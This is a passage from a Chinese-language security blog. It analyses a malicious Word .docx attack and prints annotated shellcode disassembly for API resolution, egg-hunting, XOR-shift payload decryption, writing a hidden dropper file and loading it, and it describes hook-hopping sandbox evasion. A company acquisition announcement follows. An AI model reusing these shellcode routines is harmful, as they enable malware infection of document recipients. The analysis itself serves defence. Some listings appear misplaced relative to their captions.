<font color="#F90">0870</font> <font color="#00F">; ----------------------------------------</font>
<font color="#F90">0870</font>
<font color="#F90">0870</font> loc_870: <font color="#00F">; CODE XREF: 0000085Dj</font>
<font color="#F90">0870</font> call <font color="#00F">code_decryptor</font>
<font color="#F90">0875</font> <font color="#00F">; ----------------------------------------</font>
<font color="#F90">0875</font> loc_875: <font color="#00F">; CODE XREF: 0000086Ej</font>
<font color="#F90">0875</font> jmp loc_AA6 <font color="#00F">; this part was originally</font>
<font color="#F90">0875</font> <font color="#00F">; encrypted code.</font>
</pre>
<b>第 5 步: shellcode 取得 18 個有用到的 kernel32 API 函式的指標。</b>
這個 shellcode 總共使用了 18 個 kerner32.dll 中的 API 函式,所以現在我們必須取得這些 API 在記憶體中的位址。我們先從 <a href="http://en.wikipedia.org/wiki/Process_Environment_Block">PEB</a> 中搜尋出 kernel32.dll 的起始位址,然後再利用每個函式的校驗值,撈出這 18 個函式的位址:<br>
<pre>
<font color="#F90">087A</font> lib_dropper proc near
<font color="#F90">087A</font> pop edi
<font color="#F90">087B</font> mov eax, fs:LoadLibraryA; PEB
<font color="#F90">0881</font> mov eax, [eax+<font color="#060">0Ch</font>]
<font color="#F90">0884</font> mov esi, [eax+<font color="#060">1Ch</font>]
<font color="#F90">0887</font> lodsd
<font color="#F90">0888</font>
<font color="#F90">0888</font> loc_888:
<font color="#F90">0888</font> mov ebp, [eax+<font color="#060">8</font>] <font color="#00F">; / BEGIN</font>
<font color="#F90">0888</font> <font color="#00F">; Search for kernel32.dll base</font>
<font color="#F90">088B</font> mov esi, [eax+<font color="#060">20h</font>]
<font color="#F90">088E</font> mov eax, [eax]
<font color="#F90">0890</font> cmp byte ptr [esi], <font color="#060">6Bh</font> <font color="#00F">; 'k'ernel</font>
<font color="#F90">0893</font> jnz short loc_888
<font color="#F90">0895</font> inc esi
<font color="#F90">0896</font> inc esi
<font color="#F90">0897</font> cmp byte ptr [esi], <font color="#060">65h</font> <font color="#00F">; k'e'rnel</font>
<font color="#F90">089A</font>
<font color="#F90">089A</font> loc_89A:
<font color="#F90">089A</font> jnz short loc_888
<font color="#F90">089C</font> inc esi
<font color="#F90">089D</font> inc esi
<font color="#F90">089E</font> cmp byte ptr [esi], <font color="#060">72h</font> <font color="#00F">; ke'r'nel</font>
<font color="#F90">08A1</font> jnz short loc_89A
<font color="#F90">08A3</font> inc esi
<font color="#F90">08A4</font> inc esi
<font color="#F90">08A5</font> cmp byte ptr [esi], <font color="#060">6Eh</font> <font color="#00F">; ker'n'el</font>
<font color="#F90">08A8</font> jnz short loc_89A <font color="#00F">; \ END kernel32 search</font>
<font color="#F90">08AA</font> mov esi, edi <font color="#00F">; ESI = ptr 00000AAB</font>
<font color="#F90">08AC</font> push 12h <font color="#00F">; a total of 18 functions are needed</font>
<font color="#F90">08AE</font> pop ecx
<font color="#F90">08AF</font>
<font color="#F90">08AF</font> enum_proc_addresses:
<font color="#F90">08AF</font> call <font color="#00F">Custom_GetProcAddress</font>
<font color="#F90">08AF</font> <font color="#00F">; Enumerate function</font>
<font color="#F90">08AF</font> <font color="#00F">; addresses into addr:ESI</font>
<font color="#F90">08B4</font> loop enum_proc_addresses
</pre>
這 18 個被用到的函式如下:<br>
<pre>
GetTempPathA
FreeLibraryAndExitThread
CreateFileA
CloseHandle
WriteFile
GetCurrentProcessId
CreateToolhelp32Snapshot
Thread32First
Thread32Next
SuspendThread
OpenThread
GetCurrentThreadId
LoadLibraryA
FreeLibrary
SetFilePointer
GetFileSize
VirtualAlloc
ReadFile
</pre>
<b>第 6 步: shellcode 利用 <a href="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/">egg-hunting</a> 技巧,搜尋出位於 activeX1.bin 中的 payload。</b><br>
Shellcode 擁有了其所需要的 API 位址後,就要開始找尋 存在於 activex1.bin 中的 payload 了。找尋的方式,是逐一查看所有被目前這個執行緒(屬 Word)所開啟的檔案,然後用 <a href="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/">egg-hunting</a> 技巧,設法於檔案中找出 egg。此 egg(0xB19B00B5)存在於 activex1.bin 的一開頭,目的就是為了能夠標示出 activex1.bin 於記憶體中的位置,方便我們搜尋。<br>
<br>
為了達到以上目標,shellcode 必須先於記憶體中,找到自己本身這個 .docx 檔案。所以 shellcode 執行了以下三個動作:<br>
A. 拿到下一個有被 Word 開啟的檔案的 handle。<br>
B. 如果該檔案大小 < 1000 h,那這個檔一定不是我們的 .docx 檔,跳回到 A。<br>
C. 在檔案位址 0x20 處,,讀進來 4 個位元組,判斷是否等於"cProp"?如果不是,則回到 A。<br>
<br>
"cProp" 實際上是 "docProps" 的片段。只要是 .docx 檔案,一定會有 "docProps" 這個目錄,所以第 C 動作,是判斷此檔案是否為一個 .docx 檔案。<br>
<pre>
<font color="#F90">0915</font>
<font color="#F90">0915</font> loc_915:
<font color="#F90">0915</font> add ebx, <font color="#060">4</font> <font color="#00F">; / BEGIN egg-hunting for payload</font>
<font color="#F90">0918</font> cmp ebx, offset unk_100000
<font color="#F90">091E</font> ja loc_9A9 <font color="#00F">; / BEGIN iterate through</font>
<font color="#F90">091E</font> <font color="#00F">; all open file handles</font>
<font color="#F90">0924</font> xor eax, eax
<font color="#F90">0926</font> push eax <font color="#00F">; DWORD dwMoveMethod = FILE_BEGIN</font>
<font color="#F90">0927</font> push eax <font color="#00F">; PLONG lpDistanceToMoveHigh = 0</font>
<font color="#F90">0928</font> mov al, 20h <font color="#00F">; ' '</font>
<font color="#F90">092A</font> push eax <font color="#00F">; LONG lDistanceToMove = 0x20</font>
<font color="#F90">092B</font> push ebx <font color="#00F">; HANDLE hFile</font>
<font color="#F90">092C</font> call ds:SetFilePointer[esi] <font color="#00F">; set to 0x20</font>
<font color="#F90">092F</font> cmp eax, <font color="#060">0FFFFFFFFh</font>
<font color="#F90">0932</font> jz short loc_915 <font color="#00F">; \ END</font>
<font color="#F90">0934</font> xor eax, eax
<font color="#F90">0936</font> push eax <font color="#00F">; LPTSTR lpBuffer</font>
<font color="#F90">0937</font> push ebx <font color="#00F">; DWORD nBufferLength</font>
<font color="#F90">0938</font> call ds:GetFileSize[esi] <font color="#00F">; if size < 1000h, then</font>
<font color="#F90">093B</font> cmp eax, <font color="#060">1000h</font> <font color="#00F">; it is NOT the malicious docx</font>
<font color="#F90">0940</font> jl short loc_915
<font color="#F90">0942</font> mov edi, eax
<font color="#F90">0944</font> sub esp, <font color="#060">4</font>
<font color="#F90">0947</font> mov ecx, esp
<font color="#F90">0949</font> sub esp, <font color="#060">4</font>
<font color="#F90">094C</font> mov edx, esp
<font color="#F90">094E</font> xor eax, eax
<font color="#F90">0950</font> push eax <font color="#00F">; LPOVERLAPPED lpOverlapped = NULL</font>
<font color="#F90">0951</font> push ecx <font color="#00F">; LPDWORD lpNumberOfBytesRead</font>
<font color="#F90">0952</font> push <font color="#060">4</font> <font color="#00F">; DWORD nNumberOfBytesToRead = 0x04</font>
<font color="#F90">0954</font> push edx <font color="#00F">; LPVOID lpBuffer</font>
<font color="#F90">0955</font> push ebx <font color="#00F">; HANDLE hFile = 0 = self handle</font>
<font color="#F90">0956</font> call ds:ReadFile[esi]<font color="#00F">; at offset 0x20</font>
<font color="#F90">0959</font> test eax, eax
<font color="#F90">095B</font> pop eax
<font color="#F90">095C</font> pop ecx
<font color="#F90">095D</font> jz short loc_915
<font color="#F90">095F</font> cmp eax, <font color="#060">6F725063h</font> <font color="#00F">; check for do"cPro"ps</font>
<font color="#F90">0964</font> jnz short loc_915
<font color="#F90">0966</font> sub edi, <font color="#060">24h</font> ; '$' <font color="#00F">; / BEGIN Allocate space for payload</font>
<font color="#F90">0966</font> <font color="#00F">; need: docx files size - 0x24 bytes</font>
<font color="#F90">0966</font> <font color="#00F">; (0x20 offset + 4 bytes "cProp")</font>
<font color="#F90">0966</font> <font color="#00F">; -----------------------------------</font>
<font color="#F90">0969</font> push <font color="#060">4</font> <font color="#00F">; DWORD flProtect = PAGE_READWRITE</font>
<font color="#F90">096B</font> push <font color="#060">3000h</font> <font color="#00F">; DWORD flAllocationType =</font>
<font color="#F90">096B</font> <font color="#00F">; MEM_COMMIT & MEM_RESERVE</font>
<font color="#F90">0970</font> push edi <font color="#00F">; SIZE_T dwSize</font>
<font color="#F90">0971</font> push <font color="#060">0</font> <font color="#00F">; LPVOID lpAddress = NULL</font>
<font color="#F90">0973</font> call ds:VirtualAlloc[esi]
<font color="#F90">0976</font> sub esp, <font color="#060">4</font>
<font color="#F90">0979</font> mov ecx, esp <font color="#00F">; ----------------------------</font>
<font color="#F90">0979</font> <font color="#00F">; \ END</font>
<font color="#F90">097B</font> push <font color="#060">0</font> <font color="#00F">; LPOVERLAPPED lpOverlapped = NULL</font>
<font color="#F90">097D</font> push ecx <font color="#00F">; LPDWORD lpNumberOfBytesRead</font>
<font color="#F90">097E</font> push edi <font color="#00F">; DWORD nNumberOfBytesToRead</font>
<font color="#F90">097E</font> <font color="#00F">; = GetTempPathA result - 0x24</font>
<font color="#F90">097F</font> push eax <font color="#00F">; LPVOID lpBuffer = obtainded</font>
<font color="#F90">097F</font> <font color="#00F">; via Virtual Alloc()</font>
<font color="#F90">0980</font> mov edi, eax
<font color="#F90">0982</font> push ebx <font color="#00F">; HANDLE hFile</font>
<font color="#F90">0983</font> call ds:ReadFile[esi]
<font color="#F90">0986</font> test eax, eax
<font color="#F90">0988</font> pop edx
<font color="#F90">0989</font> jz short loc_9A9
<font color="#F90">098B</font> mov eax, <font color="#060">0B19B00B5h</font> <font color="#00F">; Egg: 0xB19B00B5</font>
<font color="#F90">0990</font>
<font color="#F90">0990</font> loc_990: <font color="#00F">; CODE XREF: lib_dropper+11Ej</font>
<font color="#F90">0990</font> <font color="#00F">; lib_dropper+128j</font>
<font color="#F90">0990</font> inc edi
<font color="#F90">0991</font> dec edx
<font color="#F90">0992</font> test edx, edx <font color="#00F">; edx == 0?</font>
<font color="#F90">0994</font> jle short loc_9A9 <font color="#00F">; edx==0 but no egg found, jump</font>
<font color="#F90">0996</font> cmp [edi], eax
<font color="#F90">0998</font> jnz short loc_990
<font color="#F90">099A</font> add edi, <font color="#060">4</font>
<font color="#F90">099D</font> sub edx, <font color="#060">4</font>
<font color="#F90">09A0</font> cmp [edi], eax
<font color="#F90">09A2</font> jnz short loc_990
<font color="#F90">09A4</font> add edi, <font color="#060">4</font>
<font color="#F90">09A7</font> jmp short loc_9F3 <font color="#00F">; Egg has been found!</font>
<font color="#F90">09A9</font> ; ----------------------------------------
</pre>
<b>第 7 步: shellcode 將此 payload 脫殼,並以檔名 "a.l" 寫入磁碟。</b><br>
找到 egg 後,此 egg 所在位址的前幾個位元組,就是 XOR 的 key 以及 shift 所需要使用到的參數。這兩個值,都是接下來將 payload 脫殼所需要用到的。於是接下來,shellcode 使用 XOR-shift 演算法,將緊接於 egg 後面的 payload 脫殼,並寫入磁碟為 "%temp%\a.l".
<pre>
<font color="#F90">09A9</font> loc_9A9:
<font color="#F90">09A9</font> mov bx, cs
<font color="#F90">09AC</font> cmp bl, <font color="#060">23h</font> <font color="#00F">; '#'</font>
<font color="#F90">09AF</font> jnz short loc_9B7
<font color="#F90">09B1</font> xor edx, edx
<font color="#F90">09B3</font> push edx
<font color="#F90">09B4</font> push edx
<font color="#F90">09B5</font> push edx
<font color="#F90">09B6</font> push edx
<font color="#F90">09B7</font>
<font color="#F90">09B7</font> loc_9B7:
<font color="#F90">09B7</font> mov edx, offset unk_FFFFF
<font color="#F90">09BC</font>
<font color="#F90">09BC</font> loop_inc_page:
<font color="#F90">09BC</font> or dx, <font color="#060">0FFFh</font> <font color="#00F">; add PAGE_SIZE-1 to edx</font>
<font color="#F90">09C1</font>
<font color="#F90">09C1</font> loop_inc_one:
<font color="#F90">09C1</font> inc edx <font color="#00F">; increment pointer by one</font>
<font color="#F90">09C2</font> push edx <font color="#00F">; save edx</font>
<font color="#F90">09C3</font> cmp bl, <font color="#060">23h</font> <font color="#00F">; '#'</font>
<font color="#F90">09C6</font> jz short loc_9E1
<font color="#F90">09C8</font> push <font color="#060">2</font> <font color="#00F">; push NtAccessCheckAndAuditAlarm</font>
<font color="#F90">09CA</font> pop eax <font color="#00F">; pop into eax</font>
<font color="#F90">09CB</font> int <font color="#060">2Eh</font> <font color="#00F">; perform the syscall</font>
<font color="#F90">09CD</font> pop edx <font color="#00F">; restore edx</font>
<font color="#F90">09CE</font>
<font color="#F90">09CE</font> loc_9CE:
<font color="#F90">09CE</font> cmp al, <font color="#060">5</font>
<font color="#F90">09D0</font> jz short loop_inc_page
<font color="#F90">09D0</font> <font color="#00F">; yes, invalid ptr, go to the next page</font>
<font color="#F90">09D0</font>
<font color="#F90">09D2</font> mov eax, <font color="#060">0B19B00B5h</font> <font color="#00F">; eax = Egg: 0xB19B00B5</font>
<font color="#F90">09D7</font> mov edi, edx <font color="#00F">; Set edi to the pointer we validated</font>
<font color="#F90">09D9</font> scasd <font color="#00F">; Compare the dword in edi to ea</font>
<font color="#F90">09DA</font> jnz loop_inc_one
<font color="#F90">09DA</font> <font color="#00F">; No match? Increment the pointer by one</font>
<font color="#F90">09DC</font> scasd <font color="#00F">; Compare the dword in edi to eax again</font>
<font color="#F90">09DC</font> <font color="#00F">; (which is now edx + 4)</font>
<font color="#F90">09DD</font> jnz loop_inc_one
<font color="#F90">09DD</font> <font color="#00F">; No match? Increment the pointer by one</font>
<font color="#F90">09DF</font> jmp short loc_9F3 <font color="#00F">; Egg has been found!</font>
</pre>
<b>第 8 步: shellcode 呼叫 LoadLibrary,將 a.l 載入執行。</b><br>
在這最後一個步驟中,shellcode 呼叫 LoadLibrary,載入 a.l,成功執行 payload:
<pre>
<font color="#F90">09FB</font> push ebx <font color="#00F">; / BEGIN construct payload</font>
<font color="#F90">09FB</font> <font color="#00F">; file name</font>
<font color="#F90">09FB</font> <font color="#00F">; LPTSTR lpBuffer</font>
<font color="#F90">09FC</font> push <font color="#060">0FCh</font> <font color="#00F">; DWORD nBufferLength</font>
<font color="#F90">09FC</font> <font color="#00F">; = 0xFC (252 bytes)</font>
<font color="#F90">0A01</font> call ds:GetTempPathA[esi] <font color="#00F">; %temp%</font>
<font color="#F90">0A03</font> mov dword ptr [ebx+eax], <font color="#060">6C2E61h</font> <font color="#00F">; filename = "a.l"</font>
<font color="#F90">0A0A</font> xor eax, eax
<font color="#F90">0A0C</font> push eax <font color="#00F">; HANDLE hTemplateFile = NULL</font>
<font color="#F90">0A0D</font> push <font color="#060">2</font> <font color="#00F">; DWORD dwFlagsAndAttributes</font>
<font color="#F90">0A0D</font> <font color="#00F">; = FILE_ATTRIBUTE_HIDDEN</font>
<font color="#F90">0A0F</font> push <font color="#060">2</font> <font color="#00F">; DWORD dwCreationDisposition</font>
<font color="#F90">0A0F</font> <font color="#00F">; = CREATE_ALWAYS</font>
<font color="#F90">0A11</font> push eax <font color="#00F">; LPSECURITY_ATTRIBUTES</font>
<font color="#F90">0A11</font> <font color="#00F">; lpSecurityAttributes = NULL</font>
<font color="#F90">0A12</font> push eax <font color="#00F">; DWORD dwShareMode = NULL</font>
<font color="#F90">0A13</font> push <font color="#060">40000000h</font> <font color="#00F">; DWORD dwDesiredAccess</font>
<font color="#F90">0A13</font> <font color="#00F">; = GENERIC_WRITE</font>
<font color="#F90">0A18</font> push ebx <font color="#00F">; LPCTSTR lpFileName</font>
<font color="#F90">0A19</font> call ds:CreateFileA[esi] <font color="#00F">; \ END</font>
<font color="#F90">0A1C</font> mov edx, eax
<font color="#F90">0A1E</font> push edx
<font color="#F90">0A1F</font> push edx
<font color="#F90">0A20</font> push ebx
<font color="#F90">0A21</font> mov al, [edi] <font color="#00F">; key for XOR decryption</font>
<font color="#F90">0A23</font> inc edi
<font color="#F90">0A24</font> mov bl, [edi] <font color="#00F">; key shift</font>
<font color="#F90">0A26</font> inc edi
<font color="#F90">0A27</font> mov ecx, [edi]
<font color="#F90">0A29</font> push ecx <font color="#00F">; payload size</font>
<font color="#F90">0A2A</font> add edi, <font color="#060">4</font> <font color="#00F">; EDI now points to beginning</font>
<font color="#F90">0A2D</font> push edi <font color="#00F">; of encrypted payload</font>
<font color="#F90">0A2E</font>
<font color="#F90">0A2E</font> XOR_shift_decrypt: <font color="#00F">; CODE XREF: lib_dropper+1C0j</font>
<font color="#F90">0A2E</font> mov dl, [edi] <font color="#00F">; / BEGIN payload decryption</font>
<font color="#F90">0A30</font> xor dl, al
<font color="#F90">0A32</font> mov [edi], dl
<font color="#F90">0A34</font> inc edi
<font color="#F90">0A35</font> add al, bl
<font color="#F90">0A37</font> dec ecx
<font color="#F90">0A38</font> test ecx, ecx
<font color="#F90">0A3A</font> jnz short XOR_shift_decrypt <font color="#00F">; \ END</font>
</pre>
Payload 被執行起來後,會將內嵌於自身內部的一個惡意程式(.exe)寫入磁碟並執行起來,然後利用也是內嵌於自身內部的一個乾淨的 .docx 檔案,覆蓋掉原本的惡意 .docx 檔案,毀屍滅跡。<br>
<br>
<b>[第 II類型 <a href="http://www.phrack.org/issues.html?issue=62&id=5">hook-hopping</a> 技巧]</b><br>
第 II 類型不同於第 I 類型的地方,在於:<br>
<ol>
<li>shellcode 使用了反沙盒(hooking)的 <a href="http://www.phrack.org/issues.html?issue=62&id=5">hook-hopping</a> 技巧。</li>
<li>不內嵌 payload 與惡意程式,而是使用 URLDownloadToFileA 來下載惡意程式。</li>
</ol>
那麼最後讓我們來看看所以讓我們看看第 II類型所使用的 <a href="http://www.phrack.org/issues.html?issue=62&id=5">hook-hopping</a> 技巧。第 II 類型 shellcode 實做了二個重要的程序:get_func 和 hook_hop。<br>
<br>
get_func 負責從所需要的 dll 中,撈出所需要的函式。此 shellcode 主要用到了:kernel32.dll、urlmon32.dll 和 shell32.dll:<br>
<pre>
<font color="#F90">0A45</font> push <font color="#060">0</font> <font color="#00F">; LPOVERLAPPED lpOverlapped = NULL</font>
<font color="#F90">0A47</font> push eax <font color="#00F">; LPDWORD lpNumberOfBytesWritten</font>
<font color="#F90">0A48</font> push ecx <font color="#00F">; DWORD nNumberOfBytesToWrite</font>
<font color="#F90">0A49</font> push edi <font color="#00F">; LPCVOID lpBuffer</font>
<font color="#F90">0A4A</font> push edx <font color="#00F">; HANDLE hFile</font>
<font color="#F90">0A4B</font> call ds:WriteFile[esi]
<font color="#F90">0A4E</font> pop eax <font color="#00F">; HANDLE hFile</font>
<font color="#F90">0A4F</font> call ds:CloseHandle[esi]
<font color="#F90">0A52</font> push ebx
<font color="#F90">0A53</font> call ds:LoadLibraryA[esi]
<font color="#F90">0A56</font> push eax
<font color="#F90">0A57</font> call ds:FreeLibrary[esi]
<font color="#F90">0A5A</font> xor eax, eax
<font color="#F90">0A5C</font> push eax
<font color="#F90">0A5D</font> push eax
<font color="#F90">0A5E</font> call dword ptr ds:FreeLibraryAndExitThread[esi]
<font color="#F90">0A5E</font> lib_dropper endp
</pre>
hook_hop 則負責執行 <a href="http://www.phrack.org/issues.html?issue=62&id=5">hook-hopping</a>。它會檢查每個函式所在位址的第一個位元組(byte 0)。 如果發現該位元組是一個 CALL、JMP 或者 INT3 指令,則 hook_hop 會將第一個指令跳過。<br>
<pre>
<font color="#F90">0916</font> <font color="#00F">; =============== S U B R O U T I N E =============</font>
<font color="#F90">0916</font> get_func proc near
<font color="#F90">0916</font> push ebx
<font color="#F90">0917</font> push eax
<font color="#F90">0918</font> push edi
<font color="#F90">0919</font> mov ebx, esi <font color="#00F">; kernel32 base address</font>
<font color="#F90">091B</font> push esi
<font color="#F90">091C</font> mov esi, [ebx+<font color="#060">3Ch</font>] <font color="#00F">; get PE signature's offset</font>
<font color="#F90">091F</font> mov esi, [esi+ebx+<font color="#060">78h</font>] <font color="#00F">; get Export Table's address = 262C</font>
<font color="#F90">0923</font> add esi, ebx <font color="#00F">; move the pointer to the Export Table</font>
<font color="#F90">0925</font> push esi
<font color="#F90">0926</font> mov esi, [esi+<font color="#060">20h</font>]
<font color="#F90">0929</font> add esi, ebx
<font color="#F90">092B</font> xor ecx, ecx
<font color="#F90">092D</font> dec ecx
<font color="#F90">092E</font>
<font color="#F90">092E</font> loc_92E: <font color="#00F">; CODE XREF: get_func+31j</font>
<font color="#F90">092E</font> inc ecx
<font color="#F90">092F</font> lodsd <font color="#00F">; Obtain pointer to the function name</font>
<font color="#F90">092F</font> <font color="#00F">; ex: "CloseHandle"</font>
<font color="#F90">0930</font> add eax, ebx
<font color="#F90">0932</font> push esi
<font color="#F90">0933</font> xor esi, esi
<font color="#F90">0935</font>
<font color="#F90">0935</font> loc_935: <font color="#00F">; CODE XREF: get_func+2Cj</font>
<font color="#F90">093</font>5 movsx edx, byte ptr [eax] <font color="#00F">; / Create checksum for function's name</font>
<font color="#F90">0938</font> cmp dh, dl <font color="#00F">; |</font>
<font color="#F90">093A</font> jz short loc_944 <font color="#00F">; | Break if the hit string termination</font>
<font color="#F90">093C</font> ror esi, <font color="#060">7</font> <font color="#00F">; |</font>
<font color="#F90">093F</font> add esi, edx <font color="#00F">; |</font>
<font color="#F90">0941</font> inc eax <font color="#00F">; |</font>
<font color="#F90">0942</font> jmp short loc_935 <font color="#00F">; \</font>
<font color="#F90">0944</font> <font color="#00F">; ------------------------------------------------------</font>
<font color="#F90">0944</font>
<font color="#F90">0944</font> loc_944: <font color="#00F">; CODE XREF: get_func+24j</font>
<font color="#F90">0944</font> cmp [edi], esi <font color="#00F">; Compare the current checksum</font>
<font color="#F90">0944</font> <font color="#00F">; against the checksum list</font>
<font color="#F90">0946</font> pop esi
<font color="#F90">0947</font> jnz short loc_92E <font color="#00F">; if not equal iterate to the next</font>
<font color="#F90">0947</font> <font color="#00F">; function in the export table</font>
<font color="#F90">0949</font> pop edx
<font color="#F90">094A</font> mov ebp, ebx <font color="#00F">; / Obtain the function's entry address</font>
<font color="#F90">094C</font> mov ebx, [edx+24h] <font color="#00F">; | directly by parsing</font>
<font color="#F90">094F</font> add ebx, ebp <font color="#00F">; | kernel32.dll structure</font>
<font color="#F90">0951</font> mov cx, [ebx+ecx*2] <font color="#00F">; |</font>
<font color="#F90">0955</font> mov ebx, [edx+1Ch] <font color="#00F">; |</font>
<font color="#F90">0958</font> add ebx, ebp <font color="#00F">; |</font>
<font color="#F90">095A</font> mov eax, [ebx+ecx*4]<font color="#00F">; |</font>
<font color="#F90">095D</font> add eax, ebp <font color="#00F">; |</font>
<font color="#F90">095F</font> stosd <font color="#00F">; \ Replace the function's checksum</font>
<font color="#F90">095F</font> <font color="#00F">; with its handle</font>
<font color="#F90">0960</font> pop esi
<font color="#F90">0961</font> pop edi
<font color="#F90">0962</font> add edi, <font color="#060">4</font> <font color="#00F">; Move on to the next checksum</font>
<font color="#F90">0962</font> <font color="#00F">; in the list</font>
<font color="#F90">0965</font> pop eax
<font color="#F90">0966</font> pop ebx
<font color="#F90">0967</font> retn
<font color="#F90">0967</font> get_func endp
</pre>
大致上就是這樣子。由於架構完整並內含數個較新的技術,我們認為 docx.image 架構會成為以後惡意文件攻擊的樣版。若有興趣對於分析內容做討論,或討論其他樣本,歡迎聯絡阿碼的 <a href="https://www.facebook.com/wayne.armorize">Wayne</a>。
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-53490391052281392512013-08-09T19:30:00.000+08:002013-08-09T20:12:28.198+08:00阿碼科技即將被 Proofpoint Inc. 併購<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGV88dRJCPRkNZV0NOpeJIHKyz_thpV85_WW-DoBhn1U02xxeKf7vO0LKEuUOC86sTI0DTxPGE5u0KFpIolrqvltushQ65gohVm4spYkYpvJcylAood2OTwOmebeyRqCY7LyU7GNJcAnE/s1600/armorize_office.jpg" />
各位一直以來支持著阿碼的朋友:<br>
<br>
今天,是阿碼放煙火慶祝的日子!<br>
<br>
今天,我們帶著無比興奮的心情,跟各位報告:阿碼科技即將被美國NASDAQ上市公司 Proofpoint 併購,成為 Proofpoint 旗下的子公司!<a href="http://www.proofpoint.com/about-us/press-releases/08092013.php">(Proofpiont 新聞稿)</a><br>
<br>
這個併購案能夠這麼成功,我必須感謝過去兩年跟我一起打拼的阿碼同事,以及一路上支持我們的許多朋友。謝謝你們!<br>
<br>
過去這兩年,是我生命中最快樂的日子。能夠跟一群有默契,感情好,像一家人一樣的朋友們一起工作,能夠感覺到我們不斷在深入、在創新、在突破、在學習、在進步、在幫助客戶、在創造不可能,這種感覺實在是太過癮、太值得了!這不是金錢可以買得到的,感謝阿碼讓我有這個機會,在我生命的黃金歲月中,創造出了這麼美好的回憶!我實在是太幸運了!<br>
<br>
從Gartner最新於2013年公佈之Magic Quadrant for Secure Email Gateways<a href="http://www.proofpoint.com/id/gartner-email-security-magic-quadrant/index.php">報告</a>,我們可以看到,今天的<a href="http://www.proofpoint.com">Proofpoint</a>,已於眾Email廠商中,佔據了鮮明的領導地位:<br>
<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghjJKii9AfGgA-S5Ndn559HJIKm9KR6s-fVggfxf1RHiwFZzvCDcJp2-AKpiH3rxVzH8EXYOx5NY4U7l7LXRvoDMDxJigaaxdjxItRltCHw3coN2ZEWeAwYYdplYVngNFyhCKoyutcYu4/s1600/proofpoint_gartner_magic_quadrant.gif" /><br>
<br>
這一次,Proofpoint能夠於眾多對手中脫穎而出,主要靠的,就是阿碼與Proofpoint於今年年初共同推出的Email針對性攻擊防禦方案。針對性攻擊,英文為「APT、Advanced Persistent Threat」,直譯為「先進持續性威脅」。在APT攻擊中,攻擊者長期鎖定攻擊目標,並結合多種方法(情報、社交工程、先進攻擊技術…)達成攻擊。在這種攻擊中,最常用的管道之一,就是透過Email。攻擊者將惡意的連結(URL)或文件(PDF、Word、Excel、Powerpoint、RTF…),透過Email寄給鎖定之目標,並結合情報或社交工程之手法,讓整個Email看起來合理、正常,取得目標之信任,引誘其打開連結或附檔,而導致電腦感染惡意程式。<br>
<br>
但是,即使目標被誘導後,把惡意網址或附件給「點了下去」,又如何被感染?為何這種攻擊可以躲過防毒軟體、UTM、以及一般的Email安全設備的掃描?要探究原理,故事就要從防毒的身世說起:「大部分防毒的起源,都是針對PC上面的病毒或惡意程式來做掃描」。這句話的重點,不在於「病毒」或「惡意程式」,而在於「PC」。PC(桌機、筆電)是運算能力非常有限的,因此一路以來,防毒技術的重點,在於如何不吃掉PC上大部分資源下,如何能夠儘快掃出病毒。畢竟,誰會喜歡用一個一開機就吃掉你筆電一半的資源,讓你電池續航力立刻減半的防毒產品?<br>
<br>
網路崛起後,防毒公司發現了新大陸:他們可以將引擎,授權給網路設備商,舉凡各種網路gateway、Email gateway、Email伺服器、UTM、或甚至防火牆,都可以是他們整合的對象。看似很不錯的策略,卻也更加速地將防毒技術的方向,往「快速比對」方面引導。這些身負處理極大流量的設備,要即時能夠偵測出威脅,就必須在一瞬間做出判斷。在這個年代中,出身已經受限的防毒技術,又更加地被引導於「特徵比對」方面的技術深耕。<br>
<br>
2000年初開始,惡意程式散播的方式,發生了幾種根本性的改變:<br>
a) 逐漸從原本靠複製來散播,改成了靠攻擊弱點來散播<br>
b) 整個攻擊感染的過程,開始decouple,拆成分散但合作的組件<br>
c) 腳本語言(script languages)開始在攻擊過程中扮演重要的角色<br>
<br>
這幾種根本性的變化,讓一直以來都是以特徵比對為主的防毒技術,頓時失守,並很難有所突破。<br>
<br>
當然,一路以來,防毒產業並不是沒有創新。例如2000初紅過好一陣子的沙盒檢測技術( SandBox),在當時來說,是一種創新的思維:不靠特徵比對,而靠行為分析,來偵測出最新的威脅。當時沙盒技術沒有很成功原因,在於當時的思維仍被既有之防毒產業徹底框住,而仍把對象設定於使用者的PC上,也因此,不論沙盒技術多強,仍面臨到PC上資源拮据、環境混亂、行為複雜等問題。有些廠商想到把沙盒技術放在獨立的硬體上面來執行,以克服運算量的問題。這是很好的第一步,但是這種作法仍然無法有效運用到今天的雲端技術。<br>
<br>
我這樣說好了。我們問一個關鍵的問題:<strong>當我們增加運算量時,防毒的掃描率是否會跟著提昇?</strong>答案是否定的; 這表示,防毒產業很難利用到目前突飛猛進的雲端技術。別誤會,防毒還是可以利用雲端來提昇掃描的「量」,但是卻很難用雲端技術來提昇掃描的「質」,也就是偵測率。<br>
<br>
過去兩年在阿碼,我們的目標是:針對「次世代攻擊」,建立一個檢測平台,其偵測率是可以隨著運算量的提昇而提昇的。我們將一些很不錯的檢測分析技術,改在雲端上運算。我們設計技術的原則,不再是「如何在有限資源下,做出最好的檢測」,而是:「如何利用雲端龐大的運算量,來測出以往測不到的威脅」。在這種新思維下創造出來的技術,跟傳統技術非常不一樣,可說是開創了全新的威脅分析路線。也只有這種創新,才能讓我們擺脫過去的包袱,充分利用最新的技術,一反以往資安廠商的劣勢,掌握偵測次世代威脅的關鍵。這也是為何Proofpoint自從用了阿碼的技術後,就一直積極要併購阿碼的原因!<br>
<br>
Proofpoint目前於市場上新推出的「Target Attack Protection (TAP) 針對性攻擊檢測」,就是利用阿碼的技術來完成的。TAP掃描Email中的網址與附件,自推出以來,不斷受到客戶的肯定,在Email安全界掀起了一股旋風,也讓Proofpoint於這次Gartner 2013對Email安全廠商的評鑑中,能夠脫穎而出,成為最具創新力之龍頭廠商!<br>
<br>
其實就我們這幾年所看到的,所研究的「次世代攻擊」,遠不止於APT類型攻擊。舉個例子,在APT攻擊精神中,很重要的一環,就是目標的鎖定與範圍的定義。縮小攻擊範圍並提高針對性,可以減少攻擊曝光的機率,進而延長攻擊的壽命。這種需求,剛好跟網路上的廣告產業是一樣的:針對性、鎖定範圍、辨識機器人(如爬蟲)與真人…等。<br>
<br>
